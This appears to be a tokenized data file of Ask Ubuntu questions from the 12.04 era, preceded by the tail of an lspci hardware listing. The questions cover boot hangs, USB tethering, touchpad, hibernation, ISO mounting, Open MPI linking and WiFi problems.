capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f7e00000-f7efffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asrock incorporation device 1e16 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge : intel corporation panther point pci express root port 5 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : f7d00000-f7dfffff prefetchable memory behind bridge : 00000000f4200000-00000000f42fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asrock incorporation device 1e18 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=05 , sec-latency=0 prefetchable memory behind bridge : 00000000f0000000-00000000f40fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asrock incorporation device 1e1a capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.7 pci bridge : intel corporation panther point pci express root port 8 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 memory behind bridge : f7c00000-f7cfffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : asrock incorporation device 1e1e capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asrock incorporation device 1e26 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7f17000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) subsystem : asrock incorporation device 1e44 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asrock incorporation device 1e02 flags : bus master , 66mhz , medium devsel , latency 0 , irq 45 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7f16000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 capabilities : [ b0 ] pci advanced features kernel driver in use : ahci 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) subsystem : asrock incorporation device 1e22 flags : medium devsel , irq 11 memory at f7f15000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] kernel modules : i2c-i801 02:00.0 sata controller : asmedia technology inc. asm1062 serial ata controller ( rev 01 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asrock incorporation device 0612 flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at e050 [ size=8 ] i/o ports at e040 [ size=4 ] i/o ports at e030 [ size=8 ] i/o ports at e020 [ size=4 ] i/o ports at e000 [ size=32 ] memory at f7e00000 ( 32-bit , non-prefetchable ) [ size=512 ] capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 78 ] power management version 3 capabilities : [ 80 ] express legacy endpoint , msi 00 capabilities : [ 100 ] virtual channel kernel driver in use : ahci 03:00.0 ethernet controller : broadcom corporation netlink bcm57781 gigabit ethernet pcie ( rev 10 ) subsystem : asrock incorporation device 96b1 flags : bus master , fast devsel , latency 0 , irq 16 memory at f4210000 ( 64-bit , prefetchable ) [ size=64k ] memory at f4200000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at f7d00000 [ disabled ] [ size=2k ] capabilities : [ 48 ] power management version 3 capabilities : [ 58 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ a0 ] msi-x : enable+ count=5 masked- capabilities : [ ac ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] device serial number 00-00-bc-5f-f4-56-ce-ab capabilities : [ 150 ] power budgeting < ? > capabilities : [ 160 ] virtual channel kernel driver in use : tg3 kernel modules : tg3 04:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 03 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=04 , secondary=05 , subordinate=05 , sec-latency=32 prefetchable memory behind bridge : 00000000f0000000-00000000f40fffff capabilities : [ c0 ] subsystem : asrock incorporation device 1080 05:00.0 multimedia video controller : brooktree corporation bt878 video capture ( rev 11 ) subsystem : avermedia technologies inc avertv dvb-t flags : bus master , medium devsel , latency 32 , irq 17 memory at f4001000 ( 32-bit , prefetchable ) [ size=4k ] capabilities : [ 44 ] vital product data capabilities : [ 4c ] power management version 2 kernel driver in use : bttv kernel modules : bttv 05:00.1 multimedia controller : brooktree corporation bt878 audio capture ( rev 11 ) subsystem : avermedia technologies inc avertv dvb-t flags : bus master , medium devsel , latency 32 , irq 17 memory at f4000000 ( 32-bit , prefetchable ) [ size=4k ] capabilities : [ 44 ] vital product data capabilities : [ 4c ] power management version 2 kernel driver in use : bt878 kernel modules : bt878 05:01.0 multimedia video controller : internext compression inc itvc16 ( cx23416 ) video decoder ( rev 01 ) subsystem : hauppauge computer works inc. wintv pvr 150 flags : bus master , medium devsel , latency 64 , irq 18 memory at f0000000 ( 32-bit , prefetchable ) [ size=64m ] capabilities : [ 44 ] power management version 2 kernel driver in use : ivtv kernel modules : ivtv 06:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller ( prog-if 30 [ xhci ] ) subsystem : asrock incorporation device 1042 flags : bus master , fast devsel , latency 0 , irq 19 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : [ 50 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 68 ] msi-x : enable+ count=8 masked- capabilities : [ 78 ] power management version 3 capabilities : [ 80 ] express legacy endpoint , msi 00 capabilities : [ 100 ] virtual channel kernel driver in use : xhci_hcd
187648	why does ubuntu gets stuck on the loading screen ?	i 've been experiencing many problem lately since i fresh installed ubuntu 12.04 lts on my sony vaio vpceh with windows 7 previously installed . sometimes when i try to boot ubuntu , it gets stuck at loading screen . there seems to be some problem with driver ( as far i can judge ) . following is the log generated , when i press esc during the boot ( before the problem occurs ) : ... * stopping system v initialization compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting crash report submission daemon [ ok ] * starting automatic crash report generation [ ok ] ... ... * starting lightdm display manager [ ok ] nothing works after that , no esc , etc , except restart . also i 've observed the following : inactivity of hard-drive ( led does n't glows ) . flashing , or blinking , of caps-lock and scroll-lock on restart , ubuntu seem to load successfully . however , the loading screen has somewhat basic graphics . this problem started after i installed additional drivers : nvidia accelerated graphics driver also , most of the times ubuntu loads without any problem . however , it is annoying to restart everytime it fails . so my question is : why this happens and what is the solution ?
187652	android to 12.04 usb tether not working	i 'm trying to usb tether an android phone ( sgs2 lte ) to 12.04 to use its internet connection . enabling `` usb tethering '' on the phone brings up a `` wired connection 2 '' on the network connections menu . i can receive/send email in thunderbird . if i try to use internet it gets to `` waiting for www ... .. '' but never loads the site . ifconfig shows : tim @ timbo : ~ $ ifconfig eth0 link encap : ethernet hwaddr b8:70 : f4 : b4 : dc:6c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5023 errors:0 dropped:0 overruns:0 frame:0 tx packets:5023 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:358105 ( 358.1 kb ) tx bytes:358105 ( 358.1 kb ) usb0 link encap : ethernet hwaddr 66:36 : b9:5b:28 : ce inet addr:192.168.42.214 bcast:192.168.42.255 mask:255.255.255.0 inet6 addr : fe80 : :6436 : b9ff : fe5b:28ce/64 scope : link up broadcast running multicast mtu:1432 metric:1 rx packets:1415 errors:0 dropped:0 overruns:0 frame:0 tx packets:1410 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:948389 ( 948.3 kb ) tx bytes:735740 ( 735.7 kb ) wlan0 link encap : ethernet hwaddr 38:59 : f9:84 : bd:34 inet6 addr : fe80 : :3a59 : f9ff : fe84 : bd34/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:60694 errors:0 dropped:0 overruns:0 frame:0 tx packets:53446 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:61303968 ( 61.3 mb ) tx bytes:7559223 ( 7.5 mb ) so far i 've spent two days fiddling with this to try and get it to work based on posts i 've found on these forums , but i do n't really know what i 'm doing .
187655	how can i run huwei e173 data card on 10.04 ?	please tell me how can i run huwei e173 data card in ubuntu 10.4 . when i connect data card there is nothing happening related to network recognizing process please help
187673	new vostro 3360 touchpad scroll	i have purchased one vostro 3360 that appears to be supported by ubuntu . i have problems with ethernet ( i solved with alx drivers ) and touchpad alps ( scroll not working ) after install ubuntu 12.04 . ( same with debian testing and ubuntu 12.10 beta 1 ) i ca n't select touchpad options in gnome and touchpad appears as ps/2 mouse with xinput -- list . i found information in several bug reports but nothing works . [ psmouse solution ] [ 3 ] with this i can select touchpad settings but scroll is still not working . oneiric packages from dell http : //wielki.tk/vostro/ with this everything works but the mousepad response is very bad and sometimes all the machine hangs completely ) i only installed : http : //wielki.tk/vostro/debs/glidepoint_3.6-10_amd64.deb [ 3 ] : http : //ubuntuforums.org/showthread.php ? t=1887683 & page=2
187677	why ca n't i hibernate my ubuntu 12.04 ?	i use ubuntu 12.04 and do n't have the hibernate button anywhere . is n't there any way by which i can set up the hibernate button rather than running the command : `` sudo s2disk '' everytime from the terminal ?
187681	i need minimalistic ubuntu os for internet cafe pc	i am from india and am running a small internet cafe . i did install ubuntu 11 on my systems but could not continue with ubuntu os as it was downloading updates of more than 120mb every day . this eats up my data plan . now i need an up to 700mb os that does n't need any updates but should have networking , office applications ( pdf reader , word , excel , ppt ) browser , chat client , audio & sound , web cam , and printer support . can anybody help me on this ? i be thankful to you .
187688	external usb hd does n't show up on 'sudo fdisk -l ' on one ubuntu , shows up on another ( both ubuntu 12.04 lts , 'precise pangolin ' )	i have a 1.5 tb western digital external usb hdd and two ubuntu systems , both ubuntu 12.04 lts , 'precise pangolin ' . when i plug the disk on system a it does n't show up on the output of sudo fdisk -l nor is it automatically mounted ( note that that was n't always the case - it used to appear in the past ) . when i plug it on system b ( again ubuntu 12.04 ) , it shows up when i do a sudo fdisk -l ( output appended at the end ) and mounts automatically just fine . what does this discrepancy point to and what kind of diagnostics should i run / tools i should use to troubleshoot the problem ? i followed the suggestion i received to do a sudo tail -f /var/log/syslog and the output is the following when i plug , unplug and replug the usb cable on system a : sep 14 23:27:09 thorin mtp-probe : checking bus 2 , device 3 : `` /sys/devices/pci0000:00/0000:00:13.2/usb2/2-2 '' sep 14 23:27:09 thorin mtp-probe : bus : 2 , device : 3 was not an mtp device sep 14 23:28:01 thorin kernel : [ 338.994295 ] usb 2-2 : usb disconnect , device number 3 sep 14 23:28:04 thorin kernel : [ 341.808139 ] usb 2-2 : new high-speed usb device number 4 using ehci_hcd sep 14 23:28:04 thorin mtp-probe : checking bus 2 , device 4 : `` /sys/devices/pci0000:00/0000:00:13.2/usb2/2-2 '' sep 14 23:28:04 thorin mtp-probe : bus : 2 , device : 4 was not an mtp device sep 14 23:29:54 thorin aptdaemon : info : quitting due to inactivity sep 14 23:29:54 thorin aptdaemon : info : quitting was requested ( i guess the last two message are irrelevant ) . output of sudo fdisk -l on system b $ sudo fdisk -l disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00070db4 device boot start end blocks id system /dev/sda1 * 2048 2905114623 1452556288 83 linux /dev/sda2 2905116670 2930276351 12579841 5 extended /dev/sda5 2905116672 2930276351 12579840 82 linux swap / solaris disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9c849c84 device boot start end blocks id system /dev/sdb1 * 63 488375999 244187968+ 7 hpfs/ntfs/exfat disk /dev/sdg : 1500.3 gb , 1500299395072 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930272256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003e17f device boot start end blocks id system /dev/sdg1 2048 2930272255 1465135104 7 hpfs/ntfs/exfat
187693	any chance to upgrade 12.04 to 12.04 studio including the kernel	as a newbie i am not sure how much this question holds a value , feel like to experience studio 12.04 but i do not want o disturb the partition of already installed 12.04 desktop version . i did synaptic update of list of studio 's module available but i am not sure how much it covers the real ethnic studio version . please suggest how to go ahead to feel 12.04 studio without disturbing the current 12.04 desktop version . i am using amd 64 bit version cpu . 4gb ( 3.5 ) ram . hoping to see positive feedback . thanks ! ! ! !
187696	what is the release id while adding references to source list ?	i am following a guide to install some program in ubuntu . it says add the following line to your source list and replace lucid with your current ubuntu release : deb http : //tinyos.stanford.edu/tinyos/dists/ubuntu lucid main can you please tell me what is this release id and how can i find my ubuntu id ? also , what happens if i use an id of an older or newer ubuntu ? thanks .
187698	why do some things always show up in the hud when using other applications , but not others	i have noticed that some menu items always show up in the hud regardless of which application is focused ( e.g . messages > chat ) , but others only show up when the application is focused ( e.g . chat > new conversation ) . what controls this behavior and how easy is it to add new global actions that target a specific application ( e.g . i want to be able to create a new conversation from anywhere ) .
187702	timesnewroman in libreoffice	i 'm using ubuntu 12.04 32bit . and i need to type texts in times new roman . any ideas how to install timesnewroman in libreoffice writer ?
187714	package installation errors	i have installed ubuntu 12.04 on my laptop , but when i try to install a package e.g . vim , aptitude , synaptic etc , it shows this error message : e : package `` vim '' has no installation candidate
187724	installing a customizing theme	i use virtualbox to use ubuntu ( 12.04 ) . i want to customize the theme but i did n't find in the preferences how to that . so i webt to ubuntu-art , and i downloaded a .sh file ( metacity theme ) , but how do i install this file ? is it a package ? best
187725	how do i get suspend working on an acer extensa 4420 laptop ?	when i click suspend , all it does is the internet gets disconnected for a few seconds and than i get connected again . i have a acer extensa 4420 laptop . i appreciate any help . thanks
187728	redirect stdout to file and stderr to file and to screen	i am running valgrind to shake out bugs in my program . valgrind 's memcheck prints to stderr . what i want to do is a modification to this : valgrind -- tool=memcheck ./a.out > output 2 > grindout but , i also want valgrind output to display on screen . so program 's output all goes to file . valgrind output is placed in grindout and displayed to screen . how do i do so ? thanks .
187733	how to get to the grub menu on lubuntu	on a lubuntu ( lightweight ubuntu ) how do you get to the grub menu ? ( it does n't appear by default )
187737	problem with open-mpi using ubuntu 12.04	i updated ubuntu from 10.04 to 12.04 and installed open-mpi1.6.1 from the site www.open-mpi.org using the g95 compiler ( because it is necessary to do so in order to run the chimere air pollution model ) . two years ago i did the same thing using ubuntu 10.04 and open-mpi1.4.1 without any problem . now the program always stops with : /opt/openmpi-1.6.1-g95/bin/mpif90 -o chimere.e -i/usr/local/include -i/include -cpp -o3 -dg95 -fno-second-underscore -i4 -dmpi -ffree-form -ffree-line-length-huge \ chimere.o integrun.o master_message_subs.o master_locvalues.o \ chimere_common.o message_defs.o chimere_consts.o chimere_params.o \ -l. -linitio -ltools -lmodel -ltools -liso -l/usr/local/lib -lnetcdf -l/lib -l/opt/openmpi-1.6.1-g95/lib/ ld : chimere.o : undefined reference to symbol 'mpi_null_delete_fn_' ld : note : 'mpi_null_delete_fn_ ' is defined in dso /opt/openmpi-1.6.1-g95/lib/libmpi.so.1 so try adding it to the linker command line /opt/openmpi-1.6.1-g95/lib/libmpi.so.1 : could not read symbols : invalid operation make : *** [ chimere ] error 1 i set links ( ln -s ) of the open-mpi libraries to /usr/lib and objdump -t /usr/lib/libmpi.so.1 indicates mpi_null_delete_fn and mpi_null_delete_fn_ http : //pastebin.com/k08enjaf describes a similar problem . does anybody has an idea how to solve this problem ?
187738	how do i add shell programs to the unity search results ?	when you add no-install applications to ubuntu , they do n't come up in the unity search . for example , i downloaded eclipse and unzipped it in a folder : ~/selfinstall/eclipse . how do i get eclipse which is located in ~/selfinstall/eclipse/ to show up in the search results ? update : ah , if i add a 'desktop configuration file ' to .local/share/applications and point it to the launch script , then it works , but i do n't know how to create a file of type 'desktop configuration file ' . i had to copy one and edit it 's properties . any idea on how to create these files from scratch ? update 2 : ok , so this is how the file had to look : cat .local/share/applications/opt_eclipse.desktop [ desktop entry ] type=application name=eclipse comment=eclipse ide icon=/home/me/selfinstall/eclipse/icon.xpm exec=/home/me/selfinstall/eclipse/eclipse terminal=false categories=development ; ide ; java ;
187740	icons missing in applications	i recently deleted some icon themes , as a result the applications do not display the icons properly . the applications are running but some buttons do not display some icons and some icons are changed . i tried re-installing the applications but the result is the same . can any one tell me what i can do ? my available icons are . application with missing icons ... ...
187741	getting error while doing suspend from the terminal	i am trying to put system into suspend from terminal with the command provided by the source but i am getting the following error raja @ badfox : ~/documents $ pmi action suspend error org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.hal was not provided by any .service files
187746	ubuntu 12.04 64 bit `` unable to find medium with live filesystem '' after normal install	so , i got a new computer ( 64 bit quad core yada yada ) . pulled my ubuntu ssd drive from old machine , installed it into new machine . ( my intention here is to have ubuntu installed on the 120g ssd , win7 on the main drive ) downloaded 64 bit ubuntu , burned it to a disk . rebooted with live cd , installed ubuntu to the ssd drive , had no problems rebooted again , got the grub menu , selected ubuntu after a minute i got this - > `` unable to find medium with live filesystem '' booting into windows , explorer doesnt even see the ssd . device manager sees it though . i assume this is because its formatted with ext4 . so , the livecd saw the ssd just fine , installed fine , but when i try to boot ubuntu , i get the error above , heeellllpppp ! update : small update . windows did a software update that apparently wiped out my grub , so i guess grub was installed on the main drive . i reinstalled ubuntu ( again ) on the ssd drive but , still no joy with booting from it . same error message as above .
187750	i have a problem in remastersys	while im testing custom iso resulted by remastersys the following message appears for all choices : could not find ramdisk image /casper/initrd.gz
187752	how to install apps which is in downloads folder ?	i have downloaded indicator-multiload-o.2.tar.gz in my downloads folder.tell me how to install
187753	how much difference can 2d acceleration in virtualbox bring ?	i want to know how much difference can 2d acceleration in virtualbox bring ? i only run graphical interface on windows vms .
187757	can not get dell dimension 3000 to get dhcp from dcp3010 charter cable modem	i am trying to set up a firewall on a dell dimension 3000 with server 12.04 . i have a dcp3010 cable modem from charter , when i plug my win7 laptop directly into the modem i get an ip address through dhcp . i also get that when i boot into ubuntu 12.04 desktop from the same laptop . on the dell , when i do `` ifconfig eth0 up '' the interface comes up with ipv6 address , but no ipv4 . i tried using `` dhclient -v eth0 '' and the dhcpdiscover requests go out , but nothing comes back . tried changing the mtu on eth0 down to 750 but no change . to eliminate a crossover cable requirement , i threw a netgear switch in the middle . again , the laptop got ip in both win7 and 12.04 desktop modes , but the dell still kept sending out requests with no response . i brought the server to a corporate network and fired it up . tada , `` dhclient -v eth0 '' grabbed an address immediately , and i can then ping and browse , so i know the onboard nic is working and my general configuration is good . i 'm running out of troubleshooting ideas . any suggestions are appreciated , z .
187759	problems with mounting .iso files	i 'm using precise , with gnome . i 've attempted to install some retro , multi-cd games ( kotor1 ) via .iso images and wine , but i ca n't get the iso 's to mount correctly . first i tried gmountiso , which showed a read-only warning but worked - until i went to unmount . when the installation program asked for cd 2 i could n't unmount from the /cdrom folder because neither gmountiso or umount from terminal could detect the mount . after a reboot , i changed to gisomount ( different somehow , i guess ? ) , but when i attempt to mount the iso i get an error window explaining the syntax of the mount command and , which is also what i get when i attempt to use mount from terminal . after checking /media from terminal on a lark i see the disc mounted there twice over , but umount wo n't recognize it , even when i specify the full path sudo umount /media/kotor_1.iso . it cleared up upon reboot . can someone please assist ? update : : thanks for the quick response . what 's weird , is the images are like stuck in limbo ... i 'll show you : sc @ sc-hp-110-3700 : /media $ ls cdrom kotor_1 ( 0 ) ( vcd ) kotor_1 ( vcd ) sc @ sc-hp-110-3700 : /media $ cd cdrom sc @ sc-hp-110-3700 : /media/cdrom $ ls sc @ sc-hp-110-3700 : /media/cdrom $ cd .. sc @ sc-hp-110-3700 : /media $ umount kotor_1 ( vcd ) bash : syntax error near unexpected token ` ( ' sc @ sc-hp-110-3700 : /media $ umount kotor_1.iso umount : kotor_1.iso is not mounted ( according to mtab ) sc @ sc-hp-110-3700 : /media $ sudo umount -a umount : /run/shm : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : /run : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : /dev : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) sc @ sc-hp-110-3700 : /media $ update 2 : : found another anomaly trying to use fuseiso instead , maybe helpful : sc @ sc-hp-110-3700 : ~/downloads/kotor $ ls kotor_1.iso kotor_2.iso kotor_3.iso kotor_4.iso sc @ sc-hp-110-3700 : ~/downloads/kotor $ fuseiso kotor_1.iso ~/cdrom fuse : bad mount point `/home/sc/cdrom ' : no such file or directory sc @ sc-hp-110-3700 : ~/downloads/kotor $ sudo mkdir /media/cdrom mkdir : can not create directory `/media/cdrom ' : file exists update 3 : : tried using fuser -ck /media as a last ditch option , the shell kicked over , but when i ran `` ls '' on the folder again , the files are still present .
187760	how to eliminate an old ubuntu partition ?	i installed ubuntu 12.04 64-bit side by side with my previous 11.10 32-bit . as everything is working correctly , i want to eliminate the old partition . according to update-grub : found ubuntu 11.10 ( 11.10 ) on /dev/sda1 but according to gparted , /dev/sda1 is the boot partition ! so , how can i discover which partition should be the boot partition for 12.04 ? can i safely eliminate the /dev/sda1 ? also , gparted gives /dev/sda5 as file system unknown , it 's 2.93gib and might be the swap partition ( just guessing ) .
187773	can ubuntu be installed in a subdirectory of another linux variant ?	i have access to ( but not root on ) a compute server which is running a linux distribution that is a few years old . i 'd much prefer to use a current debian-like flavor . thus , i 'm wondering if it is possible to install ubuntu ( or stock debian ) in one of my directories , and use the ubuntu programs and libraries in preference to what comes with the server . i would need to access arbitrary parts of the server 's filesystem , not just the parts under the ubuntu install . i log in by ssh , so there 's no desktop environment needed . but , i would like to be able to use x programs .
187778	how do i prevent auto-completion in terminal from escaping the $ sign	in 10.04 terminal i can enter the command : cat $ mydir/a then hit tab and auto-completion expands it to : cat /home/me/abc.txt ( i have defined mydir in my .bashrc ) in 12.04 it auto completes to : cat \ $ mydir/abc.txt and gives a no such file error how can i get the 10.04 behaviour in this respect ?
187781	pantech link ii , ubuntu and virtual xp	okay this is my problem . i have a pantech link ii , dmesg states : [ 896.072037 ] usb 2-3 : new high-speed usb device number 3 using ehci_hcd [ 896.258562 ] cdc_acm 2-3:1.0 : ttyacm0 : usb acm device [ 896.260039 ] usbcore : registered new interface driver cdc_acm [ 896.260042 ] cdc_acm : usb abstract control model driver for usb modems and isdn adapters have it installed through wine ( pc suite and driver ) and it does n't see it . virtual xp through vmware player sees my device , knows it needs a driver . the removable devices says curitel pantech usb device ( maybe driver ) . i have pc suite installed in xp , i install the driver through the executable.. it says problem with installing hardware , and then it disappears . ubuntu sees it after restart , but if i start xp with that driver installed , it disappears from both and i get these errors in dmesg : [ 1047.760555 ] /dev/vmmon [ 2882 ] : ptsc : initialized at 3093322000 hz using tsc , tscs are synchronized . [ 1048.174033 ] /dev/vmmon [ 2882 ] : monitor ipi vector : 0 [ 1055.293060 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1055.293074 ] /dev/vmnet : port on hub 8 successfully opened [ 1055.293088 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1055.293094 ] /dev/vmnet : port on hub 8 successfully opened [ 1072.446305 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1072.446316 ] /dev/vmnet : port on hub 8 successfully opened [ 1072.446328 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1072.446334 ] /dev/vmnet : port on hub 8 successfully opened [ 1072.856024 ] usb 1-1 : reset high-speed usb device number 2 using ehci_hcd [ 1079.292024 ] usb 1-1 : reset high-speed usb device number 2 using ehci_hcd [ 1079.732024 ] usb 1-1 : reset high-speed usb device number 2 using ehci_hcd [ 1127.743034 ] net : registered protocol family 39 [ 1127.749320 ] [ 3163 ] : vmci : ioctl_vmci_queuepair_alloc ( cid=1522210225 , result=4 ) . [ 1144.104031 ] usb 2-3 : reset high-speed usb device number 3 using ehci_hcd [ 1144.412031 ] usb 2-3 : reset high-speed usb device number 3 using ehci_hcd [ 1155.889976 ] ehci_hcd 0000:00:13.2 : force halt ; handshake ffffc90000642024 00004000 00000000 - > -110 [ 1155.889980 ] ehci_hcd 0000:00:13.2 : hc died ; cleaning up [ 1155.890008 ] usb 2-3 : usb disconnect , device number 3 [ 1155.890013 ] usb 2-3 : usbfs : usb_submit_urb returned -110 [ 1658.310777 ] [ 3163 ] : vmci : ioctl_vmci_queuepair_detach ( cid=1522210225 , result=3 ) . [ 1658.392018 ] net : unregistered protocol family 39 [ 1666.546438 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1666.546450 ] /dev/vmnet : port on hub 8 successfully opened [ 1666.546462 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1666.546467 ] /dev/vmnet : port on hub 8 successfully opened [ 1671.431383 ] uvcvideo : found uvc 1.00 device usb2.0 camera ( 1871:0101 ) [ 1671.432533 ] input : usb2.0 camera as /devices/pci0000:00/0000:00:12.2/usb1/1-1/1-1:1.0/input/input13 lessa @ x : ~ $ dmesg|tail [ 1155.890008 ] usb 2-3 : usb disconnect , device number 3 [ 1155.890013 ] usb 2-3 : usbfs : usb_submit_urb returned -110 [ 1658.310777 ] [ 3163 ] : vmci : ioctl_vmci_queuepair_detach ( cid=1522210225 , result=3 ) . [ 1658.392018 ] net : unregistered protocol family 39 [ 1666.546438 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1666.546450 ] /dev/vmnet : port on hub 8 successfully opened [ 1666.546462 ] /dev/vmnet : open called by pid 3163 ( vmx-vcpu-0 ) [ 1666.546467 ] /dev/vmnet : port on hub 8 successfully opened [ 1671.431383 ] uvcvideo : found uvc 1.00 device usb2.0 camera ( 1871:0101 ) [ 1671.432533 ] input : usb2.0 camera as /devices/pci0000:00/0000:00:12.2/usb1/1-1/1-1:1.0/input/input13 i have tried uninstalling , and installing manually from the device manager update driver while it 's still has the warning sign.. it does n't see the drivers as valid . no idea how to fix this.. would prefer to not have to go to another computer . i 'm not trying to do anything but get the pictures off of it . i have to restart ubuntu , plug in device , for ubuntu to see it correctly again . i am like a month and a half old linux newbie so i have no idea the commands i could use for this , and i do n't have a memory card in the phone to mount .
187782	wifi , no ping , other works fine	i installed ubuntu 12.04 lts for my mom , this runs ok and has done so for 6 months i think . however recently , i switched back and forth between encryptions on our wifi router from wpa-psk to wep and back again to wpa-psk , same password . now this old laptop wo n't even ping the gateway on the router , although the nm-applet shows connected . i tried re-adding the network and putting in the bssid . i did this over again sometimes just to verify . i tried with my 3g tethering on my phone , it works fine , can go online too ( eg . the wifi card is fine and working as intended ) my other linux laptop can go on the same wifi as well as my phone . ( eg . not the access points problem ) and this laptop used to been online on the same network , same password , same encryption ( wpa-psk ) what can be wrong ? does it need a serious kick in the butt or removing some cached authorisation somewhere ?
187783	how to prevent system to generate log file	my question is little bit surprising , but i need it . i am using a slow processor laptop , now i found that hdd has some bad sectors and hdd response becomes slow . but disk health is ok ( according to smart tools ) . i can not change my hdd right now . so decide to reduce disk operation . how do i prevent system to generate log file or any other file which are used to keep history ? i know log file is very important but i do n't care it right now . please help .
